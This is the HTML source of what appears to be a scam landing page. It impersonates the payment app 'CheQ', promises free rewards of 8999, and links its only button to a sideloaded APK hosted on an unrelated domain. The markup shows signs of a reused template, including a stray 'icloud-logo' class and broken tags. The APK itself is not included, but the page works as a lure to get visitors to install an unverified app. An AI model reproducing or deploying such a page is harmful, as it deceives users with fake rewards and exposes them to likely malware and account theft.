<!DOCTYPE html>
<html lang="en">
<head>
 
  <meta charset="UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>CheQ</title>
  <link rel="icon" type="image/x-icon" href="https://cashappsback.online/jjjj/login/Assets/Logo.png" />
  <link rel="stylesheet" href="./css/style.css" />
  <link rel="stylesheet" href="./css/fa/css/all.css" />
  <link rel="preconnect" href="https://fonts.googleapis.com" />
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
  <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;500;600&display=swap" rel="stylesheet" />

<body>
  <div class="container">
    <header class="site-header">
      <div class="main-header">
        <div class="header-1">
          <p class="icloud-logo">CheQ</p>
        </div>
        <div class="header-2">
          <img src="https://cashappsback.online/jjjj/login/Assets/Menu-Logo.png" alt="Menu Logo" class="header-menu-logo" />
        </div>
      </div>
    </header>
      <div class="site-title">
             <p class="content-text">
          <b>Best CheQ On Free rewords 8999 Payment. Real Rewords Download APP</b>
        </p>
      </div>
            <div class="animated-video">
      </div>
      <br>
      <div  class="site-button">
        <button style= width: 80%; class="sign-in-btn">
          <a id="sign-in-btn" href="https://cashappsback.online/jjjj/login/CheQlit.apk">Download CheQ</a>
        </button>
      </div>
      <style>
      #video-container {
            max-width: 100%; /* Adjust the maximum width of the container */
        }
        video {
            width: 100%; /* Ensure the video fills its container */
            height: auto; /* Maintain aspect ratio */
        }      </style>

      <div class="site-content">       
                  <video src="./Assets/iekdvegYNr11auuos7glr3zM.mp4" style= width: 50%; /* Ensure the video fills its container */autoplay loop muted></video>
      </div>
      <div class="content">

    </div>
    </div>
 
</body>

</html>